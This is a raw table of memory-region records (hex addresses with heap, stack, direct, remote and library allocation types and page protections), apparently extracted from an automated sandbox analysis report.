|
||
2BB65E30000
|
remote allocation
|
page read and write
|
||
A063000
|
direct allocation
|
page read and write
|
||
906D000
|
unkown
|
page write copy
|
||
2D30000
|
heap
|
page read and write
|
||
269AF8D4000
|
heap
|
page read and write
|
||
269A9BEF000
|
heap
|
page read and write
|
||
3200000
|
heap
|
page read and write
|
||
2D50000
|
heap
|
page read and write
|
||
269B104A000
|
heap
|
page read and write
|
||
D4B1000
|
heap
|
page read and write
|
||
269AFC9C000
|
heap
|
page read and write
|
||
269A9656000
|
heap
|
page read and write
|
||
269AEDC6000
|
heap
|
page read and write
|
||
2B20000
|
heap
|
page read and write
|
||
2E50000
|
heap
|
page read and write
|
||
322C000
|
heap
|
page read and write
|
||
2BB65E95000
|
heap
|
page read and write
|
||
269A9656000
|
heap
|
page read and write
|
||
422000
|
unkown
|
page execute read
|
||
2B81000
|
heap
|
page read and write
|
||
269AF8A0000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
269AF8A6000
|
heap
|
page read and write
|
||
269B108C000
|
heap
|
page read and write
|
||
269B028A000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
31BF000
|
unkown
|
page read and write
|
||
B1CA000
|
trusted library allocation
|
page read and write
|
||
269AF8D5000
|
heap
|
page read and write
|
||
269AF3D6000
|
heap
|
page read and write
|
||
269AFD62000
|
heap
|
page read and write
|
||
1F5A4A08000
|
heap
|
page read and write
|
||
6049000
|
unkown
|
page execute read
|
||
269A9664000
|
heap
|
page read and write
|
||
E7A000
|
heap
|
page read and write
|
||
269AF8CA000
|
heap
|
page read and write
|
||
D9970FD000
|
stack
|
page read and write
|
||
2ABF000
|
stack
|
page read and write
|
||
2B2B000
|
heap
|
page read and write
|
||
2F80000
|
heap
|
page read and write
|
||
269B1008000
|
heap
|
page read and write
|
||
B1CA000
|
trusted library allocation
|
page read and write
|
||
269AF8AD000
|
heap
|
page read and write
|
||
2A22000
|
direct allocation
|
page read and write
|
||
3880000
|
heap
|
page read and write
|
||
D530000
|
heap
|
page read and write
|
||
2CCD000
|
stack
|
page read and write
|
||
D960000
|
remote allocation
|
page read and write
|
||
2FF3000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
29D0000
|
heap
|
page read and write
|
||
269B1194000
|
heap
|
page read and write
|
||
2CFC000
|
heap
|
page read and write
|
||
8E000
|
stack
|
page read and write
|
||
A2A7000
|
direct allocation
|
page read and write
|
||
A122000
|
direct allocation
|
page read and write
|
||
8F70000
|
unkown
|
page write copy
|
||
2B81000
|
heap
|
page read and write
|
||
EBF000
|
heap
|
page read and write
|
||
2D20000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
74E000
|
stack
|
page read and write
|
||
2FF4000
|
heap
|
page read and write
|
||
269AF5E6000
|
heap
|
page read and write
|
||
B28000
|
unkown
|
page write copy
|
||
93C6000
|
unkown
|
page readonly
|
||
269B0140000
|
heap
|
page read and write
|
||
2B90000
|
heap
|
page read and write
|
||
269B0E7C000
|
heap
|
page read and write
|
||
2F04000
|
heap
|
page read and write
|
||
269AF772000
|
heap
|
page read and write
|
||
43B0000
|
heap
|
page read and write
|
||
8F65000
|
unkown
|
page read and write
|
||
9034000
|
unkown
|
page read and write
|
||
269AF628000
|
heap
|
page read and write
|
||
3360000
|
heap
|
page read and write
|
||
2F03000
|
heap
|
page read and write
|
||
2E46000
|
heap
|
page read and write
|
||
269B06EC000
|
heap
|
page read and write
|
||
373F000
|
unkown
|
page read and write
|
||
2AA6000
|
direct allocation
|
page read and write
|
||
269B0AE0000
|
heap
|
page read and write
|
||
B62E000
|
stack
|
page read and write
|
||
269AF8BE000
|
heap
|
page read and write
|
||
269B07F4000
|
heap
|
page read and write
|
||
269AEB01000
|
heap
|
page read and write
|
||
269AF8BE000
|
heap
|
page read and write
|
||
93A9000
|
unkown
|
page readonly
|
||
269B00FE000
|
heap
|
page read and write
|
||
1CBF6FE000
|
stack
|
page read and write
|
||
269AFEEE000
|
heap
|
page read and write
|
||
9049000
|
unkown
|
page read and write
|
||
30C3000
|
heap
|
page read and write
|
||
E82000
|
heap
|
page read and write
|
||
B1D9000
|
trusted library allocation
|
page read and write
|
||
269AF8B2000
|
heap
|
page read and write
|
||
5B4000
|
heap
|
page read and write
|
||
269A9656000
|
heap
|
page read and write
|
||
23158989000
|
heap
|
page read and write
|
||
61F5000
|
unkown
|
page execute read
|
||
269AF3D6000
|
heap
|
page read and write
|
||
2DE0000
|
heap
|
page read and write
|
||
269AFB52000
|
heap
|
page read and write
|
||
308E000
|
unkown
|
page read and write
|
||
2E70000
|
heap
|
page read and write
|
||
1CBFAFE000
|
stack
|
page read and write
|
||
ACB000
|
unkown
|
page write copy
|
||
2BA0000
|
heap
|
page read and write
|
||
2D24000
|
heap
|
page read and write
|
||
9314000
|
unkown
|
page readonly
|
||
2B81000
|
heap
|
page read and write
|
||
3560000
|
heap
|
page read and write
|
||
3880000
|
heap
|
page read and write
|
||
269B0F84000
|
heap
|
page read and write
|
||
B52F000
|
stack
|
page read and write
|
||
93F9000
|
unkown
|
page readonly
|
||
9413000
|
unkown
|
page readonly
|
||
2D64000
|
heap
|
page read and write
|
||
A190000
|
direct allocation
|
page read and write
|
||
A050000
|
direct allocation
|
page read and write
|
||
A104000
|
direct allocation
|
page read and write
|
||
13112000
|
heap
|
page read and write
|
||
30C3000
|
heap
|
page read and write
|
||
2BB65ECC000
|
heap
|
page read and write
|
||
8F44000
|
unkown
|
page write copy
|
||
2D03000
|
heap
|
page read and write
|
||
3246000
|
heap
|
page read and write
|
||
8F7D000
|
unkown
|
page write copy
|
||
29CF000
|
direct allocation
|
page read and write
|
||
269B0560000
|
heap
|
page read and write
|
||
93EA000
|
unkown
|
page readonly
|
||
93EF000
|
unkown
|
page readonly
|
||
2D03000
|
heap
|
page read and write
|
||
3220000
|
heap
|
page read and write
|
||
E84000
|
heap
|
page read and write
|
||
3574000
|
heap
|
page read and write
|
||
2B46000
|
heap
|
page read and write
|
||
269AFBD6000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
269A9664000
|
heap
|
page read and write
|
||
2A43000
|
heap
|
page read and write
|
||
2D63000
|
heap
|
page read and write
|
||
928F000
|
unkown
|
page readonly
|
||
269AF898000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2315A400000
|
heap
|
page read and write
|
||
2BB65E66000
|
heap
|
page read and write
|
||
269B0B22000
|
heap
|
page read and write
|
||
2A30000
|
heap
|
page read and write
|
||
2C3E000
|
unkown
|
page read and write
|
||
B1CA000
|
trusted library allocation
|
page read and write
|
||
269AF8B5000
|
heap
|
page read and write
|
||
6FD000
|
stack
|
page read and write
|
||
269B0DF8000
|
heap
|
page read and write
|
||
AB3000
|
unkown
|
page write copy
|
||
DE0000
|
heap
|
page read and write
|
||
E72000
|
heap
|
page read and write
|
||
92AD000
|
unkown
|
page readonly
|
||
3573000
|
heap
|
page read and write
|
||
2E54000
|
heap
|
page read and write
|
||
2D10000
|
heap
|
page read and write
|
||
FFDD0000
|
direct allocation
|
page read and write
|
||
269B13E6000
|
heap
|
page read and write
|
||
269B05E4000
|
heap
|
page read and write
|
||
269AEF52000
|
heap
|
page read and write
|
||
2A9F000
|
direct allocation
|
page read and write
|
||
2D56000
|
heap
|
page read and write
|
||
E0F000
|
heap
|
page read and write
|
||
269ACF91000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
92E3000
|
unkown
|
page readonly
|
||
269AF89B000
|
heap
|
page read and write
|
||
269B030E000
|
heap
|
page read and write
|
||
D51E000
|
heap
|
page read and write
|
||
269AF352000
|
heap
|
page read and write
|
||
C7106FE000
|
stack
|
page read and write
|
||
9061000
|
unkown
|
page write copy
|
||
23158990000
|
heap
|
page read and write
|
||
269B01C4000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
269B0E7C000
|
heap
|
page read and write
|
||
3370000
|
heap
|
page read and write
|
||
269AEFD6000
|
heap
|
page read and write
|
||
3200000
|
heap
|
page read and write
|
||
269AF8B3000
|
heap
|
page read and write
|
||
269AFEAC000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
E83000
|
heap
|
page read and write
|
||
1F5A4A09000
|
heap
|
page read and write
|
||
269AF28C000
|
heap
|
page read and write
|
||
34EE000
|
stack
|
page read and write
|
||
269AF5E6000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
5B3000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
269B143D000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
92DE000
|
unkown
|
page readonly
|
||
2B81000
|
heap
|
page read and write
|
||
32B0000
|
heap
|
page read and write
|
||
3880000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
29B0000
|
direct allocation
|
page read and write
|
||
120F000
|
stack
|
page read and write
|
||
30FD000
|
stack
|
page read and write
|
||
30C3000
|
heap
|
page read and write
|
||
93E4000
|
unkown
|
page readonly
|
||
269AEE4A000
|
heap
|
page read and write
|
||
93AF000
|
unkown
|
page readonly
|
||
269B0D74000
|
heap
|
page read and write
|
||
30BF000
|
stack
|
page read and write
|
||
3460000
|
heap
|
page read and write
|
||
269A9656000
|
heap
|
page read and write
|
||
3380000
|
heap
|
page read and write
|
||
2BB65E62000
|
heap
|
page read and write
|
||
9340000
|
unkown
|
page readonly
|
||
30BF000
|
stack
|
page read and write
|
||
269AFCDE000
|
heap
|
page read and write
|
||
2315892E000
|
heap
|
page read and write
|
||
9403000
|
unkown
|
page readonly
|
||
31FE000
|
stack
|
page read and write
|
||
5B4000
|
heap
|
page read and write
|
||
92B2000
|
unkown
|
page readonly
|
||
2B81000
|
heap
|
page read and write
|
||
92B8000
|
unkown
|
page readonly
|
||
D81C000
|
stack
|
page read and write
|
||
E63000
|
heap
|
page read and write
|
||
269B1218000
|
heap
|
page read and write
|
||
B232000
|
heap
|
page read and write
|
||
75AA000
|
unkown
|
page execute read
|
||
1CBF9FF000
|
stack
|
page read and write
|
||
269AF87A000
|
heap
|
page read and write
|
||
269AF66A000
|
heap
|
page read and write
|
||
269B07F4000
|
heap
|
page read and write
|
||
A4F2000
|
direct allocation
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
EB8000
|
heap
|
page read and write
|
||
6BE000
|
stack
|
page read and write
|
||
5480000
|
heap
|
page read and write
|
||
48A000
|
unkown
|
page execute read
|
||
3573000
|
heap
|
page read and write
|
||
29F7000
|
direct allocation
|
page read and write
|
||
6940000
|
unkown
|
page execute read
|
||
934E000
|
unkown
|
page readonly
|
||
8F68000
|
unkown
|
page write copy
|
||
28AD000
|
stack
|
page read and write
|
||
2D10000
|
heap
|
page read and write
|
||
A0A4000
|
direct allocation
|
page read and write
|
||
269AF8A7000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
B031000
|
direct allocation
|
page read and write
|
||
2C90000
|
heap
|
page read and write
|
||
54BC000
|
unkown
|
page execute read
|
||
2B81000
|
heap
|
page read and write
|
||
269AF89D000
|
heap
|
page read and write
|
||
2E20000
|
heap
|
page read and write
|
||
2E90000
|
heap
|
page read and write
|
||
B13000
|
unkown
|
page read and write
|
||
269AF730000
|
heap
|
page read and write
|
||
604000
|
heap
|
page read and write
|
||
130F9000
|
heap
|
page read and write
|
||
269AEC8C000
|
heap
|
page read and write
|
||
269B0EBE000
|
heap
|
page read and write
|
||
B1C7000
|
trusted library allocation
|
page read and write
|
||
2EDC000
|
heap
|
page read and write
|
||
E48000
|
heap
|
page read and write
|
||
92DC000
|
unkown
|
page readonly
|
||
269AFFF6000
|
heap
|
page read and write
|
||
269AF8A7000
|
heap
|
page read and write
|
||
B1B0000
|
trusted library allocation
|
page read and write
|
||
940F000
|
unkown
|
page readonly
|
||
269B0A5C000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
3340000
|
heap
|
page read and write
|
||
5B3000
|
heap
|
page read and write
|
||
A0D7000
|
direct allocation
|
page read and write
|
||
B1C7000
|
trusted library allocation
|
page read and write
|
||
1F5A49E0000
|
heap
|
page read and write
|
||
2C30000
|
heap
|
page read and write
|
||
2A44000
|
heap
|
page read and write
|
||
E3A000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
269AF6EE000
|
heap
|
page read and write
|
||
A259000
|
direct allocation
|
page read and write
|
||
231588A0000
|
heap
|
page read and write
|
||
269AF8CC000
|
heap
|
page read and write
|
||
269AED01000
|
heap
|
page read and write
|
||
76ED000
|
unkown
|
page execute read
|
||
269AC591000
|
heap
|
page read and write
|
||
3254000
|
heap
|
page read and write
|
||
93B6000
|
unkown
|
page readonly
|
||
2B81000
|
heap
|
page read and write
|
||
A3AD000
|
direct allocation
|
page read and write
|
||
269AFE6A000
|
heap
|
page read and write
|
||
1F5A4975000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
9E95000
|
unkown
|
page readonly
|
||
269AF8CF000
|
heap
|
page read and write
|
||
B1D9000
|
trusted library allocation
|
page read and write
|
||
2CA0000
|
heap
|
page read and write
|
||
269B0B23000
|
heap
|
page read and write
|
||
269B1110000
|
heap
|
page read and write
|
||
3030000
|
heap
|
page read and write
|
||
2CF0000
|
heap
|
page read and write
|
||
5B0000
|
heap
|
page read and write
|
||
2BB65EE5000
|
heap
|
page read and write
|
||
269AF8CA000
|
heap
|
page read and write
|
||
269AF838000
|
heap
|
page read and write
|
||
A06E000
|
direct allocation
|
page read and write
|
||
2BB65E66000
|
heap
|
page read and write
|
||
4FD000
|
stack
|
page read and write
|
||
269B12DE000
|
heap
|
page read and write
|
||
231588E9000
|
heap
|
page read and write
|
||
269AF8CC000
|
heap
|
page read and write
|
||
A468000
|
direct allocation
|
page read and write
|
||
2AAD000
|
direct allocation
|
page read and write
|
||
9300000
|
unkown
|
page readonly
|
||
2B81000
|
heap
|
page read and write
|
||
2BB65E89000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2B25000
|
heap
|
page read and write
|
||
2BB65ECC000
|
heap
|
page read and write
|
||
269AF8CA000
|
heap
|
page read and write
|
||
A555000
|
direct allocation
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
ACE7000
|
stack
|
page read and write
|
||
8F3D000
|
unkown
|
page read and write
|
||
269B1443000
|
heap
|
page read and write
|
||
AFA5000
|
direct allocation
|
page read and write
|
||
269AF8C7000
|
heap
|
page read and write
|
||
603000
|
heap
|
page read and write
|
||
2A5D000
|
direct allocation
|
page read and write
|
||
93E1000
|
unkown
|
page readonly
|
||
269B0038000
|
heap
|
page read and write
|
||
B4CE000
|
direct allocation
|
page read and write
|
||
F34000
|
heap
|
page read and write
|
||
D9971FF000
|
stack
|
page read and write
|
||
9014000
|
unkown
|
page read and write
|
||
269A9697000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
A268000
|
direct allocation
|
page read and write
|
||
269B1008000
|
heap
|
page read and write
|
||
2A91000
|
direct allocation
|
page read and write
|
||
269AF8B0000
|
heap
|
page read and write
|
||
6F879000
|
unkown
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
A10D000
|
direct allocation
|
page read and write
|
||
6F851000
|
unkown
|
page execute read
|
||
2BA0000
|
heap
|
page read and write
|
||
1F5A4970000
|
heap
|
page read and write
|
||
3254000
|
heap
|
page read and write
|
||
B023000
|
direct allocation
|
page read and write
|
||
269AF6AC000
|
heap
|
page read and write
|
||
269B13A4000
|
heap
|
page read and write
|
||
269AF8B0000
|
heap
|
page read and write
|
||
3253000
|
heap
|
page read and write
|
||
3590000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
29AD000
|
stack
|
page read and write
|
||
269AF8D9000
|
heap
|
page read and write
|
||
1F5A49E0000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2A49000
|
heap
|
page read and write
|
||
2F60000
|
heap
|
page read and write
|
||
269B0FC6000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
5A0000
|
heap
|
page read and write
|
||
23158989000
|
heap
|
page read and write
|
||
269AF894000
|
heap
|
page read and write
|
||
23158916000
|
heap
|
page read and write
|
||
2BB65EE5000
|
heap
|
page read and write
|
||
269A9667000
|
heap
|
page read and write
|
||
269A9CEE000
|
heap
|
page read and write
|
||
269B09D8000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2BB65E10000
|
heap
|
page read and write
|
||
3140000
|
heap
|
page read and write
|
||
55D000
|
stack
|
page read and write
|
||
92E5000
|
unkown
|
page readonly
|
||
618C000
|
unkown
|
page execute read
|
||
2B81000
|
heap
|
page read and write
|
||
D577000
|
heap
|
page read and write
|
||
269B0182000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2A48000
|
direct allocation
|
page read and write
|
||
2D03000
|
heap
|
page read and write
|
||
269AF051000
|
heap
|
page read and write
|
||
269B007A000
|
heap
|
page read and write
|
||
269AEBC6000
|
heap
|
page read and write
|
||
A3E8000
|
direct allocation
|
page read and write
|
||
E77000
|
heap
|
page read and write
|
||
269AFC18000
|
heap
|
page read and write
|
||
650D000
|
unkown
|
page execute read
|
||
269B1008000
|
heap
|
page read and write
|
||
2315C2D0000
|
trusted library allocation
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
6F875000
|
unkown
|
page readonly
|
||
2CF6000
|
heap
|
page read and write
|
||
269AF8AA000
|
heap
|
page read and write
|
||
B31000
|
unkown
|
page readonly
|
||
5A4000
|
heap
|
page read and write
|
||
29B7000
|
direct allocation
|
page read and write
|
||
269AEE8C000
|
heap
|
page read and write
|
||
6E4B000
|
unkown
|
page execute read
|
||
E70000
|
heap
|
page read and write
|
||
32FF000
|
stack
|
page read and write
|
||
269AF05A000
|
heap
|
page read and write
|
||
269B0F00000
|
heap
|
page read and write
|
||
269AF629000
|
heap
|
page read and write
|
||
269A96D9000
|
heap
|
page read and write
|
||
269B03D4000
|
heap
|
page read and write
|
||
2BCF000
|
stack
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
B1CA000
|
trusted library allocation
|
page read and write
|
||
269AF8CF000
|
heap
|
page read and write
|
||
2BB65E9E000
|
heap
|
page read and write
|
||
269B0BE8000
|
heap
|
page read and write
|
||
2315891D000
|
heap
|
page read and write
|
||
2A14000
|
direct allocation
|
page read and write
|
||
B1B0000
|
trusted library allocation
|
page read and write
|
||
23158982000
|
heap
|
page read and write
|
||
E5D000
|
heap
|
page read and write
|
||
2FB0000
|
heap
|
page read and write
|
||
2AED000
|
stack
|
page read and write
|
||
269AFB10000
|
heap
|
page read and write
|
||
ADEA000
|
stack
|
page read and write
|
||
130E7000
|
heap
|
page read and write
|
||
269B1218000
|
heap
|
page read and write
|
||
269AF772000
|
heap
|
page read and write
|
||
269B0996000
|
heap
|
page read and write
|
||
2F7E000
|
unkown
|
page read and write
|
||
2CA2000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
3090000
|
heap
|
page read and write
|
||
269AF184000
|
heap
|
page read and write
|
||
269AF7F6000
|
heap
|
page read and write
|
||
269B125B000
|
heap
|
page read and write
|
||
2E2E000
|
stack
|
page read and write
|
||
9405000
|
unkown
|
page readonly
|
||
2315C160000
|
heap
|
page read and write
|
||
269AF8B5000
|
heap
|
page read and write
|
||
2D04000
|
heap
|
page read and write
|
||
269A96D9000
|
heap
|
page read and write
|
||
1F5A6750000
|
heap
|
page read and write
|
||
2D64000
|
heap
|
page read and write
|
||
269AF8B0000
|
heap
|
page read and write
|
||
1F5A4910000
|
heap
|
page read and write
|
||
3120000
|
heap
|
page read and write
|
||
2E54000
|
heap
|
page read and write
|
||
269A965A000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
AF8000
|
unkown
|
page read and write
|
||
2DCD000
|
stack
|
page read and write
|
||
2B54000
|
heap
|
page read and write
|
||
2C4F000
|
unkown
|
page read and write
|
||
603000
|
heap
|
page read and write
|
||
2CFD000
|
stack
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2FDE000
|
stack
|
page read and write
|
||
9382000
|
unkown
|
page readonly
|
||
269A9664000
|
heap
|
page read and write
|
||
29C4000
|
direct allocation
|
page read and write
|
||
269AF839000
|
heap
|
page read and write
|
||
23158C60000
|
heap
|
page read and write
|
||
269B0CAE000
|
heap
|
page read and write
|
||
B230000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2A3D000
|
stack
|
page read and write
|
||
35DE000
|
stack
|
page read and write
|
||
8F52000
|
unkown
|
page write copy
|
||
414000
|
unkown
|
page execute read
|
||
D509000
|
heap
|
page read and write
|
||
C70FFFE000
|
stack
|
page read and write
|
||
269AF8AF000
|
heap
|
page read and write
|
||
EDE000
|
heap
|
page read and write
|
||
8F3F000
|
unkown
|
page read and write
|
||
269AF8C9000
|
heap
|
page read and write
|
||
269AF89D000
|
heap
|
page read and write
|
||
269AEF52000
|
heap
|
page read and write
|
||
A6BE000
|
stack
|
page read and write
|
||
B42D000
|
trusted library allocation
|
page read and write
|
||
2BE0000
|
heap
|
page read and write
|
||
DDE000
|
stack
|
page read and write
|
||
ABC000
|
unkown
|
page read and write
|
||
269AFACE000
|
heap
|
page read and write
|
||
2CF0000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
A700000
|
heap
|
page read and write
|
||
269AEC4A000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
D95C000
|
stack
|
page read and write
|
||
9062000
|
unkown
|
page read and write
|
||
23158932000
|
heap
|
page read and write
|
||
2F1F000
|
stack
|
page read and write
|
||
2FC0000
|
heap
|
page read and write
|
||
23158934000
|
heap
|
page read and write
|
||
269B1152000
|
heap
|
page read and write
|
||
9347000
|
unkown
|
page readonly
|
||
23158909000
|
heap
|
page read and write
|
||
3120000
|
heap
|
page read and write
|
||
2FE6000
|
heap
|
page read and write
|
||
D551000
|
heap
|
page read and write
|
||
269B0954000
|
heap
|
page read and write
|
||
269B0B64000
|
heap
|
page read and write
|
||
C7109FE000
|
stack
|
page read and write
|
||
269AFF72000
|
heap
|
page read and write
|
||
269B030E000
|
heap
|
page read and write
|
||
2C8E000
|
stack
|
page read and write
|
||
2F09000
|
heap
|
page read and write
|
||
269AF45A000
|
heap
|
page read and write
|
||
B1D9000
|
trusted library allocation
|
page read and write
|
||
B1D9000
|
trusted library allocation
|
page read and write
|
||
23158C65000
|
heap
|
page read and write
|
||
2A0D000
|
direct allocation
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
9054000
|
unkown
|
page read and write
|
||
2E50000
|
heap
|
page read and write
|
||
269B04DC000
|
heap
|
page read and write
|
||
269AF89D000
|
heap
|
page read and write
|
||
2E54000
|
heap
|
page read and write
|
||
2CA0000
|
heap
|
page read and write
|
||
269B1218000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2ABC000
|
direct allocation
|
page read and write
|
||
750000
|
heap
|
page read and write
|
||
269A9670000
|
heap
|
page read and write
|
||
269B1497000
|
heap
|
page read and write
|
||
2A43000
|
heap
|
page read and write
|
||
269B129C000
|
heap
|
page read and write
|
||
2A7D000
|
stack
|
page read and write
|
||
269B0D74000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
269B072E000
|
heap
|
page read and write
|
||
269B0F42000
|
heap
|
page read and write
|
||
2F9F000
|
unkown
|
page read and write
|
||
269AEECE000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
770000
|
heap
|
page read and write
|
||
E84000
|
heap
|
page read and write
|
||
93A5000
|
unkown
|
page readonly
|
||
E0E000
|
heap
|
page read and write
|
||
50D000
|
stack
|
page read and write
|
||
934B000
|
unkown
|
page readonly
|
||
93DD000
|
unkown
|
page readonly
|
||
543E000
|
stack
|
page read and write
|
||
30C3000
|
heap
|
page read and write
|
||
93CC000
|
unkown
|
page readonly
|
||
930F000
|
unkown
|
page readonly
|
||
32B0000
|
heap
|
page read and write
|
||
603000
|
heap
|
page read and write
|
||
2D5E000
|
stack
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
1F5A4A02000
|
heap
|
page read and write
|
||
269AEE00000
|
heap
|
page read and write
|
||
269AF8B3000
|
heap
|
page read and write
|
||
ACF000
|
unkown
|
page read and write
|
||
F34000
|
heap
|
page read and write
|
||
5BA000
|
heap
|
page read and write
|
||
269AF8D4000
|
heap
|
page read and write
|
||
269AF310000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
5460000
|
direct allocation
|
page execute and read and write
|
||
D52C000
|
heap
|
page read and write
|
||
2CA4000
|
heap
|
page read and write
|
||
906E000
|
unkown
|
page readonly
|
||
2D63000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
269AF8A1000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
54A3000
|
unkown
|
page execute read
|
||
36DF000
|
stack
|
page read and write
|
||
30CA000
|
heap
|
page read and write
|
||
269B129C000
|
heap
|
page read and write
|
||
2B7C000
|
stack
|
page read and write
|
||
3579000
|
heap
|
page read and write
|
||
3100000
|
heap
|
page read and write
|
||
2BA0000
|
heap
|
page read and write
|
||
4AC000
|
unkown
|
page execute read
|
||
269A96D9000
|
heap
|
page read and write
|
||
2AFC000
|
stack
|
page read and write
|
||
269AF101000
|
heap
|
page read and write
|
||
269B0CF0000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
42C000
|
unkown
|
page execute read
|
||
23158870000
|
heap
|
page read and write
|
||
3150000
|
heap
|
page read and write
|
||
269AEC08000
|
heap
|
page read and write
|
||
2315A8D0000
|
heap
|
page read and write
|
||
269AF8B5000
|
heap
|
page read and write
|
||
2B53000
|
heap
|
page read and write
|
||
2ECE000
|
stack
|
page read and write
|
||
2C90000
|
heap
|
page read and write
|
||
269B0912000
|
heap
|
page read and write
|
||
75D000
|
stack
|
page read and write
|
||
383F000
|
stack
|
page read and write
|
||
2A74000
|
direct allocation
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
269A96D9000
|
heap
|
page read and write
|
||
2980000
|
heap
|
page read and write
|
||
1F5A49FB000
|
heap
|
page read and write
|
||
269AFC9D000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
560000
|
heap
|
page read and write
|
||
2BB66020000
|
heap
|
page read and write
|
||
2DB0000
|
heap
|
page read and write
|
||
318F000
|
stack
|
page read and write
|
||
2AC0000
|
heap
|
page read and write
|
||
1F5A49E0000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
269B0AE0000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
30B0000
|
heap
|
page read and write
|
||
92D4000
|
unkown
|
page readonly
|
||
269B028A000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
301F000
|
stack
|
page read and write
|
||
9433000
|
unkown
|
page readonly
|
||
A300000
|
direct allocation
|
page read and write
|
||
269A9658000
|
heap
|
page read and write
|
||
604000
|
heap
|
page read and write
|
||
2E6F000
|
unkown
|
page read and write
|
||
269AF8B8000
|
heap
|
page read and write
|
||
A290000
|
direct allocation
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
903F000
|
unkown
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
F34000
|
heap
|
page read and write
|
||
269B0B64000
|
heap
|
page read and write
|
||
269A965D000
|
heap
|
page read and write
|
||
23158989000
|
heap
|
page read and write
|
||
8F99000
|
unkown
|
page read and write
|
||
269A96D9000
|
heap
|
page read and write
|
||
110E000
|
stack
|
page read and write
|
||
23158990000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
E72000
|
heap
|
page read and write
|
||
269A9656000
|
heap
|
page read and write
|
||
A39E000
|
direct allocation
|
page read and write
|
||
9F22000
|
unkown
|
page readonly
|
||
2B81000
|
heap
|
page read and write
|
||
113AD000
|
stack
|
page read and write
|
||
2DCC000
|
stack
|
page read and write
|
||
5F0000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2B4E000
|
unkown
|
page read and write
|
||
2BB65ECC000
|
heap
|
page read and write
|
||
905F000
|
unkown
|
page read and write
|
||
3370000
|
heap
|
page read and write
|
||
6AE5000
|
unkown
|
page execute read
|
||
2B81000
|
heap
|
page read and write
|
||
269B051E000
|
heap
|
page read and write
|
||
1F5A48F0000
|
heap
|
page read and write
|
||
2F04000
|
heap
|
page read and write
|
||
269AEB42000
|
heap
|
page read and write
|
||
93CE000
|
unkown
|
page readonly
|
||
D4E5000
|
heap
|
page read and write
|
||
8F42000
|
unkown
|
page write copy
|
||
2E53000
|
heap
|
page read and write
|
||
2BB65E89000
|
heap
|
page read and write
|
||
2BB65E8A000
|
heap
|
page read and write
|
||
8F12000
|
unkown
|
page execute read
|
||
D59E000
|
heap
|
page read and write
|
||
93D3000
|
unkown
|
page readonly
|
||
55E000
|
unkown
|
page read and write
|
||
3566000
|
heap
|
page read and write
|
||
269B125A000
|
heap
|
page read and write
|
||
580000
|
heap
|
